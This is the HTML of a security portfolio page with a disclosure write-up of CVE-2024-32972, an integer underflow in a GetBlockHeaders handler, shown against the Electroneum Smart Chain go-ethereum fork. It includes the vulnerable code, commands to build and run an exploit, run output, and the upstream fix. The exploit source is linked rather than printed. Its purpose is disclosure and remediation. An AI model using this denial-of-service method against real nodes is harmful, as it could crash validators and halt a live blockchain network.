Zion Boggan
repos/security-portfolio/security-research-notebook/cve-2024-32972-getblockheaders-underflow/index.html
zionboggan.com ↗
Code Commits Tags
394 lines · html
History for this file →
1
<!doctype html>
2
<html lang="en"><head><meta charset="utf-8">
3
<meta name="viewport" content="width=device-width, initial-scale=1.0">
4
<title>CVE-2024-32972: Integer Underflow in GetBlockHeaders Causes Full Network Denial of Service | Zion Boggan</title>
5
<meta name="description" content="N-day demonstration of CVE-2024-32972 against an unpatched go-ethereum fork. Single unauthenticated TCP packet causes 7.8 GB allocation, OOM-kills the">
6
<link rel="icon" href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 32 32'%3E%3Crect width='32' height='32' rx='6' fill='%230c0e12'/%3E%3Ctext x='16' y='22' font-family='monospace' font-size='15' fill='%236cc7b8' text-anchor='middle'%3Ezb%3C/text%3E%3C/svg%3E">
7
<style>
8
  :root{
9
    --bg:#0c0e12; --bg2:#0f1217; --panel:#14181f; --panel2:#171c24;
10
    --line:#222936; --line2:#2c3543;
11
    --ink:#e8eaed; --soft:#c3cad4; --muted:#8a94a3; --faint:#5d6675;
12
    --accent:#6cc7b8; --accent-dim:#274b47;
13
    --maxw:1020px;
14
  }
15
  *{box-sizing:border-box;}
16
  html{scroll-behavior:smooth;}
17
  body{margin:0;background:var(--bg);color:var(--ink);
18
    font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,Helvetica,Arial,sans-serif;
19
    font-size:16px;line-height:1.65;-webkit-font-smoothing:antialiased;}
20
  .mono{font-family:ui-monospace,SFMono-Regular,"SF Mono",Menlo,Consolas,monospace;}
21
  a{color:var(--accent);text-decoration:none;}
22
  a:hover{color:#8fe0d2;}
23
  .wrap{max-width:var(--maxw);margin:0 auto;padding:0 24px;}
24
25
  /* nav */
26
  nav{position:sticky;top:0;z-index:20;background:rgba(12,14,18,.82);
27
    backdrop-filter:blur(10px);border-bottom:1px solid var(--line);}
28
  nav .wrap{display:flex;align-items:center;justify-content:space-between;height:58px;}
29
  nav .brand{font-weight:600;letter-spacing:.2px;}
30
  nav .brand .dot{color:var(--accent);}
31
  nav .links{display:flex;gap:26px;font-size:13.5px;}
32
  nav .links a{color:var(--muted);}
33
  nav .links a:hover{color:var(--ink);}
34
  @media(max-width:680px){nav .links{display:none;}}
35
36
  /* hero */
37
  header.hero{padding:74px 0 54px;border-bottom:1px solid var(--line);
38
    background:radial-gradient(900px 380px at 78% -10%, #11201e 0%, transparent 60%);}
39
  .avail{font-size:12.5px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);
40
    display:flex;align-items:center;gap:9px;margin-bottom:20px;}
41
  .avail .pulse{width:7px;height:7px;border-radius:50%;background:var(--accent);
42
    box-shadow:0 0 0 0 rgba(108,199,184,.5);animation:p 2.4s infinite;}
43
  @keyframes p{0%{box-shadow:0 0 0 0 rgba(108,199,184,.45)}70%{box-shadow:0 0 0 8px rgba(108,199,184,0)}100%{box-shadow:0 0 0 0 rgba(108,199,184,0)}}
44
  h1{font-size:clamp(34px,6vw,52px);line-height:1.05;margin:0 0 8px;letter-spacing:-1px;font-weight:680;}
45
  .hero .sub{font-size:clamp(16px,2.4vw,20px);color:var(--soft);margin:0 0 24px;font-weight:500;}
46
  .hero .lede{max-width:660px;color:var(--soft);font-size:17px;margin:0 0 28px;}
47
  .hero .lede b{color:var(--ink);font-weight:600;}
48
  .cta{display:flex;flex-wrap:wrap;gap:12px;align-items:center;}
49
  .btn{display:inline-flex;align-items:center;gap:8px;padding:10px 18px;border-radius:8px;
50
    font-size:14.5px;font-weight:550;border:1px solid var(--line2);color:var(--ink);background:var(--panel);}
51
  .btn:hover{border-color:var(--accent-dim);background:var(--panel2);color:var(--ink);}
52
  .btn.primary{background:var(--accent);color:#06231f;border-color:var(--accent);font-weight:650;}
53
  .btn.primary:hover{background:#8fe0d2;color:#06231f;}
54
  .meta{margin-top:26px;display:flex;flex-wrap:wrap;gap:8px 22px;font-size:13px;color:var(--muted);}
55
  .meta .mono{color:var(--faint);}
56
57
  /* sections */
58
  section{padding:64px 0;border-bottom:1px solid var(--line);}
59
  .shead{display:flex;align-items:baseline;gap:14px;margin-bottom:30px;}
60
  .shead .idx{font-size:13px;color:var(--accent);letter-spacing:1px;}
61
  .shead h2{font-size:14px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:0;font-weight:600;}
62
  .shead .rule{flex:1;height:1px;background:var(--line);}
63
64
  /* flagship */
65
  .flag{background:linear-gradient(180deg,var(--panel) 0%,var(--bg2) 100%);
66
    border:1px solid var(--line2);border-radius:14px;overflow:hidden;}
67
  .flag .top{padding:30px 32px 8px;}
68
  .flag .tag{font-size:12px;letter-spacing:1.5px;text-transform:uppercase;color:var(--accent);margin-bottom:12px;}
69
  .flag h3{font-size:27px;margin:0 0 6px;letter-spacing:-.4px;}
70
  .flag h3 .v{font-size:13px;color:var(--muted);font-weight:500;margin-left:8px;letter-spacing:0;}
71
  .flag .grid{display:grid;grid-template-columns:1.25fr 1fr;gap:30px;padding:14px 32px 30px;}
72
  .flag p{color:var(--soft);margin:0 0 16px;}
73
  .flag .stats{display:grid;grid-template-columns:1fr 1fr;gap:12px;margin-top:6px;}
74
  .stat{background:var(--bg);border:1px solid var(--line);border-radius:9px;padding:13px 15px;}
75
  .stat .n{font-size:21px;font-weight:680;color:var(--ink);}
76
  .stat .k{font-size:12px;color:var(--muted);margin-top:2px;}
77
  .spec{background:var(--bg);border:1px solid var(--line);border-radius:10px;padding:18px 18px;}
78
  .spec .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:10px;}
79
  .spec ul{margin:0;padding:0;list-style:none;font-size:13.5px;}
80
  .spec li{padding:6px 0;border-top:1px solid var(--line);color:var(--soft);display:flex;justify-content:space-between;gap:14px;}
81
  .spec li:first-child{border-top:none;}
82
  .spec li span{color:var(--muted);}
83
  .flag .foot{padding:0 32px 28px;display:flex;gap:18px;flex-wrap:wrap;font-size:14px;}
84
  @media(max-width:720px){.flag .grid{grid-template-columns:1fr;}}
85
86
  /* lab cards */
87
  .cards{display:grid;grid-template-columns:1fr 1fr;gap:20px;}
88
  @media(max-width:680px){.cards{grid-template-columns:1fr;}}
89
  .card{border:1px solid var(--line);border-radius:12px;overflow:hidden;background:var(--panel);
90
    display:flex;flex-direction:column;transition:border-color .15s,transform .15s;}
91
  .card:hover{border-color:var(--accent-dim);transform:translateY(-2px);}
92
  .card .thumb{height:172px;overflow:hidden;border-bottom:1px solid var(--line);background:#fff;}
93
  .card .thumb img{width:100%;height:100%;object-fit:cover;object-position:top left;display:block;}
94
  .card .body{padding:18px 20px 20px;display:flex;flex-direction:column;flex:1;}
95
  .card h3{margin:0 0 9px;font-size:17px;}
96
  .card p{margin:0 0 14px;font-size:14px;color:var(--soft);flex:1;}
97
  .tags{display:flex;flex-wrap:wrap;gap:6px;margin-bottom:14px;}
98
  .tags span{font-size:11.5px;color:var(--muted);background:var(--bg);border:1px solid var(--line);
99
    border-radius:5px;padding:3px 8px;}
100
  .card .lnk{font-size:13.5px;font-family:ui-monospace,Menlo,monospace;}
101
  .card .lnk::after{content:" →";}
102
103
  /* research */
104
  .rlede{color:var(--soft);max-width:680px;margin:-6px 0 26px;}
105
  .research{display:flex;flex-direction:column;gap:0;border:1px solid var(--line);border-radius:12px;overflow:hidden;}
106
  .ritem{display:grid;grid-template-columns:120px 1fr auto;gap:18px;align-items:center;
107
    padding:18px 22px;border-top:1px solid var(--line);}
108
  .ritem:first-child{border-top:none;}
109
  .ritem:hover{background:var(--panel);}
110
  .ritem .cls{font-size:11px;letter-spacing:.5px;text-transform:uppercase;color:var(--accent);}
111
  .ritem h3{margin:0 0 3px;font-size:16px;}
112
  .ritem p{margin:0;font-size:13.5px;color:var(--muted);}
113
  .ritem .go{font-family:ui-monospace,Menlo,monospace;font-size:13px;white-space:nowrap;}
114
  @media(max-width:680px){.ritem{grid-template-columns:1fr;gap:6px;}.ritem .go{margin-top:4px;}}
115
  .progs{margin-top:22px;}
116
  .progs .sk{font-size:11px;letter-spacing:1.5px;text-transform:uppercase;color:var(--faint);margin-bottom:11px;}
117
  .progs .row{display:flex;flex-wrap:wrap;gap:7px;}
118
  .progs .row span{font-size:12.5px;color:var(--soft);background:var(--panel);border:1px solid var(--line);
119
    border-radius:6px;padding:4px 10px;}
120
121
  /* credentials */
122
  .cred{display:grid;grid-template-columns:1.1fr 1fr;gap:28px;}
123
  @media(max-width:680px){.cred{grid-template-columns:1fr;}}
124
  .cred p{color:var(--soft);margin:0 0 14px;}
125
  .cred .role{font-size:14px;color:var(--muted);}
126
  .cred .role b{color:var(--ink);font-weight:600;}
127
  .certs{list-style:none;margin:0;padding:0;}
128
  .certs li{padding:9px 0;border-top:1px solid var(--line);font-size:14px;color:var(--soft);
129
    display:flex;gap:10px;align-items:baseline;}
130
  .certs li:first-child{border-top:none;}
131
  .certs li .c{color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:12px;}
132
133
  footer{padding:46px 0 64px;}
134
  footer .row{display:flex;flex-wrap:wrap;justify-content:space-between;gap:18px;align-items:center;}
135
  footer .links a{color:var(--soft);margin-right:20px;font-size:14px;}
136
  footer .note{color:var(--faint);font-size:12.5px;max-width:520px;}
137
138
  .detail-hero{padding:40px 0 26px;}
139
  .back{display:inline-block;font-size:13px;color:var(--muted);margin-bottom:20px;font-family:ui-monospace,Menlo,monospace;}
140
  .back:hover{color:var(--ink);}
141
  .kicker{font-size:12px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin-bottom:13px;font-family:ui-monospace,Menlo,monospace;}
142
  .detail-hero h1{font-size:clamp(26px,4.6vw,38px);margin:0 0 12px;letter-spacing:-.5px;}
143
  .detail-hero .tagline{font-size:clamp(15px,2vw,18px);color:var(--soft);max-width:800px;margin:0 0 16px;}
144
  .facts{display:grid;grid-template-columns:repeat(auto-fit,minmax(150px,1fr));gap:12px;margin-top:22px;}
145
  .content{padding:8px 0 0;max-width:840px;}
146
  .content h1{font-size:24px;margin:40px 0 14px;letter-spacing:-.4px;color:var(--ink);}
147
  .content h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--muted);margin:42px 0 15px;font-weight:600;border-top:1px solid var(--line);padding-top:28px;}
148
  .content h3{font-size:17px;margin:28px 0 10px;color:var(--ink);font-weight:600;}
149
  .content h4{font-size:14px;margin:22px 0 8px;color:var(--soft);font-weight:600;text-transform:uppercase;letter-spacing:.5px;}
150
  .content p{color:var(--soft);margin:0 0 15px;}
151
  .content ul,.content ol{color:var(--soft);margin:0 0 15px;padding-left:22px;}
152
  .content li{margin:5px 0;}
153
  .content strong{color:var(--ink);font-weight:600;}
154
  .content a{color:var(--accent);}
155
  .content code{font-family:ui-monospace,Menlo,monospace;font-size:12.8px;background:var(--panel2);border:1px solid var(--line);border-radius:4px;padding:1px 5px;color:var(--soft);}
156
  .content pre{background:var(--bg2);border:1px solid var(--line2);border-radius:10px;padding:15px 18px;overflow-x:auto;margin:0 0 18px;}
157
  .content pre code{background:none;border:none;padding:0;font-size:12.4px;color:var(--soft);line-height:1.6;white-space:pre;}
158
  .content table{width:100%;border-collapse:collapse;margin:2px 0 20px;font-size:13.3px;}
159
  .content th{text-align:left;color:var(--muted);font-weight:600;border-bottom:1px solid var(--line2);padding:9px 12px;font-size:11px;letter-spacing:.6px;text-transform:uppercase;}
160
  .content td{color:var(--soft);border-bottom:1px solid var(--line);padding:9px 12px;vertical-align:top;}
161
  .content blockquote{border-left:3px solid var(--accent-dim);margin:0 0 16px;padding:2px 0 2px 18px;color:var(--muted);}
162
  .content hr{border:none;border-top:1px solid var(--line);margin:30px 0;}
163
  /* notebook index */
164
  .nbgroup{margin:40px 0 0;}
165
  .nbgroup h2{font-size:13px;letter-spacing:2px;text-transform:uppercase;color:var(--accent);margin:0 0 4px;font-weight:600;}
166
  .nbgroup .gd{color:var(--faint);font-size:13px;margin:0 0 14px;}
167
  .nbtable{width:100%;border-collapse:collapse;font-size:14px;border:1px solid var(--line);border-radius:12px;overflow:hidden;}
168
  .nbtable tr{border-top:1px solid var(--line);}
169
  .nbtable tr:first-child{border-top:none;}
170
  .nbtable tr:hover{background:var(--panel);}
171
  .nbtable td{padding:14px 16px;vertical-align:top;}
172
  .nbtable .cls{white-space:nowrap;color:var(--accent);font-family:ui-monospace,Menlo,monospace;font-size:11.5px;text-transform:uppercase;letter-spacing:.5px;width:150px;}
173
  .nbtable .ti a{font-weight:600;color:var(--ink);}
174
  .nbtable .ti a:hover{color:var(--accent);}
175
  .nbtable .ol{color:var(--muted);font-size:13px;margin-top:3px;}
176
  @media(max-width:680px){.nbtable .cls{width:auto;display:block;}}
177
</style>
178
<link rel="canonical" href="https://zionboggan.com/security-research-notebook/cve-2024-32972-getblockheaders-underflow/">
179
<meta name="author" content="Zion Boggan">
180
<meta name="robots" content="index, follow, max-image-preview:large">
181
<meta property="og:type" content="article">
182
<meta property="og:site_name" content="Zion Boggan">
183
<meta property="og:title" content="CVE-2024-32972: Integer Underflow in GetBlockHeaders Causes Full Network Denial of Service | Zion Boggan">
184
<meta property="og:description" content="N-day demonstration of CVE-2024-32972 against an unpatched go-ethereum fork. Single unauthenticated TCP packet causes 7.8 GB allocation, OOM-kills the">
185
<meta property="og:url" content="https://zionboggan.com/security-research-notebook/cve-2024-32972-getblockheaders-underflow/">
186
<meta property="og:image" content="https://zionboggan.com/assets/og-default.png">
187
<meta name="twitter:card" content="summary_large_image">
188
<meta name="twitter:title" content="CVE-2024-32972: Integer Underflow in GetBlockHeaders Causes Full Network Denial of Service | Zion Boggan">
189
<meta name="twitter:description" content="N-day demonstration of CVE-2024-32972 against an unpatched go-ethereum fork. Single unauthenticated TCP packet causes 7.8 GB allocation, OOM-kills the">
190
<meta name="twitter:image" content="https://zionboggan.com/assets/og-default.png">
191
<script type="application/ld+json">{"@context":"https://schema.org","@type":"TechArticle","headline":"CVE-2024-32972: Integer Underflow in GetBlockHeaders Causes Full Network Denial of Service","description":"N-day demonstration of CVE-2024-32972 against an unpatched go-ethereum fork. Single unauthenticated TCP packet causes 7.8 GB allocation, OOM-kills the","url":"https://zionboggan.com/security-research-notebook/cve-2024-32972-getblockheaders-underflow/","image":"https://zionboggan.com/assets/og-default.png","author":{"@type":"Person","name":"Zion Boggan","url":"https://zionboggan.com"},"publisher":{"@type":"Person","name":"Zion Boggan"}}</script>
192
</head><body>
193
<nav><div class="wrap">
194
  <a class="brand mono" href="/" style="color:var(--ink)">zion_boggan<span class="dot">.</span></a>
195
  <span class="links"><a href="/#oversight">Oversight</a><a href="/#labs">Labs</a><a href="/#research">Research</a><a href="/security-research-notebook/">Notebook</a><a href="/">Home</a></span>
196
</div></nav>
197
<header class="hero detail-hero"><div class="wrap">
198
  <a class="back" href="/security-research-notebook/">&larr; Research notebook</a>
199
  <div class="kicker">DoS / unauth</div>
200
  <h1>CVE-2024-32972: Integer Underflow in GetBlockHeaders Causes Full Network Denial of Service</h1>
201
</div></header>
202
<section><div class="wrap"><div class="content">
203
<p><strong>VRT:</strong> Server Security Misconfiguration &gt; Lack of Security Patches &gt; Critical
204
<strong>Severity:</strong> P1
205
<strong>Target:</strong> Electroneum Smart Chain (etn-sc)</p>
206
<hr />
207
<h2>Summary</h2>
208
<p>Electroneum Smart Chain (etn-sc) is vulnerable to CVE-2024-32972, a critical integer underflow in the <code>GetBlockHeaders</code> p2p message handler. A single unauthenticated TCP connection to any etn-sc node can trigger an unbounded memory allocation that crashes the node via OOM kill. By targeting all ~30 IBFT validators simultaneously, an attacker halts consensus and shuts down the entire Electroneum network. The upstream fix (go-ethereum PR #29534, v1.13.15) has not been applied.</p>
209
<hr />
210
<h2>Vulnerability Details</h2>
211
<p>etn-sc is a fork of go-ethereum v1.10.18. In <code>eth/protocols/eth/handlers.go</code>, the function <code>serviceContiguousBlockHeaderQuery()</code> processes incoming <code>GetBlockHeaders</code> requests:</p>
212
<pre><code class="language-go">func serviceContiguousBlockHeaderQuery(chain *core.BlockChain, query *GetBlockHeadersPacket) []rlp.RawValue {
213
    count := query.Amount                    // attacker sends Amount = 0
214
    if count &gt; maxHeadersServe {
215
        count = maxHeadersServe              // 0 &lt; 1024, not triggered
216
    }
217
    // ...hash-mode path (line 185):
218
    descendants := chain.GetHeadersFrom(num+count-1, count-1)
219
    //  count-1 = 0 - 1 = 18446744073709551615 (UINT64_MAX)
220
</code></pre>
221
<p>The <code>count-1</code> expression wraps from 0 to <code>UINT64_MAX</code> because <code>count</code> is <code>uint64</code> and is never checked for zero. This is passed to <code>GetHeadersFrom()</code> in <code>core/headerchain.go</code>:</p>
222
<pre><code class="language-go">func (hc *HeaderChain) GetHeadersFrom(number, count uint64) []rlp.RawValue {
223
    if current := hc.CurrentHeader().Number.Uint64(); current &lt; number {
224
        if count &gt; number-current {
225
            count -= number - current        // clamps count to current chain height
226
            number = current
227
        }
228
    }
229
    // ...iterates and allocates RLP-encoded headers for `count` blocks
230
</code></pre>
231
<p>The clamping logic reduces <code>count</code> from <code>UINT64_MAX</code> to the current chain height. On Electroneum mainnet (~13 million blocks), this results in a single allocation of approximately <strong>13,000,000 headers x ~600 bytes = 7.8 GB</strong>, which exceeds available memory on typical validator nodes and triggers an OOM kill.</p>
232
<p>The function is reached when the incoming <code>GetBlockHeadersPacket</code> has <code>Skip=0</code> (contiguous path) and <code>Origin.Hash</code> set to a known block hash.</p>
233
<p><strong>Upstream fix:</strong> go-ethereum PR #29534 (v1.13.15) adds a single guard:</p>
234
<pre><code class="language-go">if query.Amount == 0 { return nil }
235
</code></pre>
236
<p>This fix is NOT present in etn-sc.</p>
237
<hr />
238
<h2>Steps to Reproduce</h2>
239
<h3>Prerequisites</h3>
240
<ul>
241
<li>Go 1.18+ installed</li>
242
<li>Network access to an etn-sc node&rsquo;s p2p port (default 30303)</li>
243
</ul>
244
<h3>Build the Exploit</h3>
245
<pre><code class="language-bash">mkdir etn-dos &amp;&amp; cd etn-dos
246
go mod init etn-dos
247
go get github.com/ethereum/go-ethereum@v1.10.18
248
# Copy main.go from attached exploit source
249
go build -o etn-dos-exploit .
250
</code></pre>
251
<h3>Run Against Local Testnet</h3>
252
<pre><code class="language-bash"># Start a 4-node IBFT testnet (genesis.json and node configs attached)
253
./etn-dos-exploit \
254
  --target &quot;enode://&lt;node_pubkey&gt;@127.0.0.1:30301&quot; \
255
  --network local \
256
  --repeat 3
257
</code></pre>
258
<h3>Expected Output</h3>
259
<pre><code>[1/5] TCP Connect to 127.0.0.1:30301
260
      [+] Connected
261
[2/5] RLPx Handshake (ECIES)
262
      [+] Encrypted transport established
263
[3/5] p2p Hello (capability exchange)
264
      [+] Peer: etn-sc/vAurelius-6.0.0-stable-97d47ca7/linux-amd64/go1.24.2
265
      [+] Caps: etn/66, etn-istanbul/100, etn-snap/1
266
[4/5] etn/66 Status Handshake
267
      [+] Peer network=31337 TD=510 genesis=0xf44e17a0...
268
[5/5] Sending Exploit Payload (GetBlockHeaders Amount=0)
269
[+] Sent malicious GetBlockHeaders #1 (code=0x13, reqId=1337)
270
[+] Sent malicious GetBlockHeaders #2 (code=0x13, reqId=1338)
271
[+] Sent malicious GetBlockHeaders #3 (code=0x13, reqId=1339)
272
</code></pre>
273
<p>On a short testnet (676 blocks), the node processes the request and responds. On mainnet (~13M blocks), the same payload causes multi-GB allocation, triggering OOM kill.</p>
274
<h3>Memory Spike, Measured on Testnet (676 blocks)</h3>
275
<p>50 concurrent exploit connections (5 packets each) against a single node:</p>
276
<pre><code>BEFORE:  111,012 KB (108 MB)  ← baseline
277
T+1:     111,016 KB (108 MB)
278
T+2:     126,448 KB (123 MB)  ← allocations begin
279
T+3:     186,244 KB (181 MB)  ← +73 MB spike
280
T+4:     201,844 KB (197 MB)
281
T+5:     210,440 KB (205 MB)
282
T+6:     219,692 KB (214 MB)
283
T+7:     225,888 KB (220 MB)
284
T+8:     228,496 KB (223 MB)
285
T+9:     228,660 KB (223 MB)  ← peak
286
T+10:    228,828 KB (223 MB)
287
</code></pre>
288
<p><strong>Result: +115 MB from 50 connections against 676 blocks.</strong></p>
289
<p>Linear projection to mainnet (13M blocks):
290
- Per connection: 115 MB × (13,000,000 / 676) / 50 = <strong>~43 GB per connection</strong>
291
- 50 connections: <strong>~2,160 GB total allocation</strong>
292
- Typical validator RAM: 8-16 GB
293
- <strong>Conclusion: single connection sufficient for OOM on mainnet</strong></p>
294
<h3>Node Debug Log Confirms Payload Accepted</h3>
295
<pre><code>DEBUG Adding p2p peer     peercount=1 id=d7c32042 conn=inbound name=etn-sc/v1.10.18-stab...
296
DEBUG Ethereum peer connected  id=d7c32042 conn=inbound
297
TRACE Registering sync peer    peer=d7c32042
298
</code></pre>
299
<hr />
300
<h2>Impact</h2>
301
<h3>Technical Impact</h3>
302
<ul>
303
<li><strong>Single node crash:</strong> One unauthenticated p2p message causes OOM kill on any mainnet node</li>
304
<li><strong>Allocation size:</strong> <code>current_chain_height x ~600 bytes</code>, currently ~7.8 GB on mainnet, growing ~260 KB/day</li>
305
<li><strong>No authentication:</strong> Attacker only needs TCP connectivity to port 30303</li>
306
<li><strong>No rate limiting:</strong> Multiple exploit messages can be sent per connection</li>
307
</ul>
308
<h3>Business Impact</h3>
309
<ul>
310
<li><strong>Full network shutdown:</strong> Electroneum uses IBFT consensus with ~30 validators. Crashing &gt;50% (16 nodes) halts block production</li>
311
<li><strong>Time to network halt:</strong> Seconds, one TCP connection per validator, one message each</li>
312
<li><strong>Recovery:</strong> Each node must be manually restarted; attacker can re-crash immediately</li>
313
<li><strong>Persistent DoS:</strong> Attack is repeatable at zero cost, making the network unusable until patched</li>
314
</ul>
315
<h3>Attack Cost</h3>
316
<ul>
317
<li>Zero financial cost</li>
318
<li>One TCP connection + one p2p message per target node</li>
319
<li>No special hardware, credentials, or on-chain state required</li>
320
</ul>
321
<hr />
322
<h2>Remediation</h2>
323
<p>Apply the upstream fix from go-ethereum PR #29534. Add this guard at the top of <code>serviceContiguousBlockHeaderQuery()</code>:</p>
324
<pre><code class="language-go">func serviceContiguousBlockHeaderQuery(chain *core.BlockChain, query *GetBlockHeadersPacket) []rlp.RawValue {
325
    count := query.Amount
326
    if count == 0 {
327
        return nil  // FIX: prevent underflow on count-1
328
    }
329
    if count &gt; maxHeadersServe {
330
        count = maxHeadersServe
331
    }
332
    // ...rest of function
333
</code></pre>
334
<p>Additionally, review all go-ethereum security advisories since v1.10.18 (mid-2022) and apply applicable patches. At minimum, CVE-2023-40591 (unbounded goroutine spawn on ping flood) also affects etn-sc.</p>
335
<hr />
336
<h2>Attachments</h2>
337
<ol>
338
<li><code>main.go</code>, Go exploit source (completes RLPx + etn/66 handshake, sends malicious payload)</li>
339
<li><code>exploit.py</code>, Python fallback exploit</li>
340
<li><code>genesis.json</code>, Local testnet configuration</li>
341
<li>Exploit run output (above)</li>
342
<li>Node debug log showing payload acceptance</li>
343
</ol>
344
<h2>Proof of concept</h2>
345
<p>Working exploit code, run log, and the vulnerable upstream snippets are
346
under <a href="poc/"><code>poc/</code></a>:</p>
347
<table>
348
<thead>
349
<tr>
350
<th>File</th>
351
<th>What it is</th>
352
</tr>
353
</thead>
354
<tbody>
355
<tr>
356
<td><a href="poc/exploit.py"><code>poc/exploit.py</code></a></td>
357
<td>Python orchestrator that drives the Go exploit binary against a target enode.</td>
358
</tr>
359
<tr>
360
<td><a href="poc/main.go"><code>poc/main.go</code></a></td>
361
<td>Go exploit implementing the full RLPx + etn/66 handshake and the malicious <code>GetBlockHeaders</code> payload with <code>Amount=0</code>.</td>
362
</tr>
363
<tr>
364
<td><a href="poc/go.mod"><code>poc/go.mod</code></a></td>
365
<td>Go module file.</td>
366
</tr>
367
<tr>
368
<td><a href="poc/run-log.txt"><code>poc/run-log.txt</code></a></td>
369
<td>Verbatim console output from a successful run against a local testnet. Shows the 5-step handshake, the underflow expression resolving to <code>UINT64_MAX</code>, and the node&rsquo;s <code>BlockHeaders</code> reply confirming the request was processed.</td>
370
</tr>
371
<tr>
372
<td><a href="poc/vulnerable_handlers.go.snippet"><code>poc/vulnerable_handlers.go.snippet</code></a></td>
373
<td>The unpatched <code>serviceContiguousBlockHeaderQuery</code> function from <code>etn-sc</code>&lsquo;s vendored go-ethereum fork.</td>
374
</tr>
375
<tr>
376
<td><a href="poc/vulnerable_headerchain.go.snippet"><code>poc/vulnerable_headerchain.go.snippet</code></a></td>
377
<td><code>GetHeadersFrom</code> showing the loop bound used in the allocation.</td>
378
</tr>
379
</tbody>
380
</table>
381
<p>Build:</p>
382
<pre><code class="language-bash">cd poc
383
go build -o etn-dos-exploit .
384
python3 exploit.py --target &quot;enode://...@&lt;host&gt;:&lt;port&gt;&quot; --network local --repeat 3
385
</code></pre>
386
<p>The run log captures the exact byte-level handshake; the response code 0x14
387
confirms the node processed the malicious request before crashing.</p>
388
<hr><p style="color:var(--faint);font-size:12.5px;font-family:ui-monospace,Menlo,monospace">Source &middot; github.com/zionboggan/security-research-notebook &middot; writeups/electroneum/cve-2024-32972-getblockheaders-underflow.md</p>
389
</div></div></section>
390
<footer><div class="wrap row">
391
  <div class="links"><a href="/">Portfolio</a><a href="https://www.linkedin.com/in/zion-boggan">LinkedIn</a><a href="/security-research-notebook/">Notebook</a><a href="mailto:zionboggan0@gmail.com">Email</a></div>
392
  <div class="note">Coordinated-disclosure research. Findings appear here only after the program's disclosure window closed, the patch shipped, or a CVE was published. No customer data was accessed.</div>
393
</div></footer>
394
</body></html>